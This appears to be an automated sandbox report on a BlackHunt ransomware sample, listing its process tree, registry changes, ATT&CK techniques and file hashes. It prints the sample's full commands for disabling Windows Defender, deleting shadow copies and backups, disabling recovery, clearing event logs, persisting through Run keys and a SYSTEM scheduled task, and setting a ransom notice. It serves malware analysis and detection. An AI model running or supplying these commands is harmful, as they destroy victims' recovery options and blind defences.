b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 49 PID 3036 wrote to memory of 2888 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 49 PID 3036 wrote to memory of 2888 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 49 PID 3036 wrote to memory of 2612 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 79 PID 3036 wrote to memory of 2612 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 79 PID 3036 wrote to memory of 2612 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 79 PID 3036 wrote to memory of 2612 3036 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 79 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe"C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3036 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1956
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2596
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2400
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2164
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2196
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2204
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe" /F2⤵PID:1400
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe" /F3⤵
- Creates scheduled task(s)
PID:824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2968
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:288
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1804
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:360
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:488
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2792
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2172
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2788
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2084
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1072
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1400
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:720
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2488
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:332
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2936
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2764
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1952
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2604
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1520
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2220
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe"2⤵
- Deletes itself
PID:964 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2304
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:904
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3000
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2916
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:2440
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:2836
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2916
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:2476
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:780
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:2120
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2912
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2260
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2168
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:628
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1672
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1966240700207726467-18417839911517385060-1968241961-123075693910662508151949881805"1⤵PID:2844
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-60387653918387325741057056561-30076237418009039411502194273-1144458797-571138798"1⤵PID:2260
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "164285756-1702619090-6972660101014585868-89123139-1697892633-174554281459982138"1⤵PID:596
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1336773935-14578122612053214292-423279089-667405179-1385237284382896941922211047"1⤵PID:2064
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-158721779115907756621608086059479646032-1607138152-1197394427-953412187600043255"1⤵PID:2196
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1280
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:2248
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"1⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1700
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:2640
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b80f7a1a134b41717f20f6d8928db4db
SHA19281095fd5a06bfa7be2f8c697ea6e149f86f5c2
SHA2563d4cbf82f7556e6fb518a469aa68b905f65b15afdc0e8b745ce981971d82e0ad
SHA512f4f270dc107b65deab7e6e099af82a60fc52cdc2ddb09f5d1153e87913d9790b75334fca782edf4098861e0e179fdae8b65ee1862e7de6db484e05808bf3c067
-
Filesize
12KB
MD5cba5ca158ce3e3e58fff716ce6dffa33
SHA17919d9a2c0df8c4abf524168ae11906570193f50
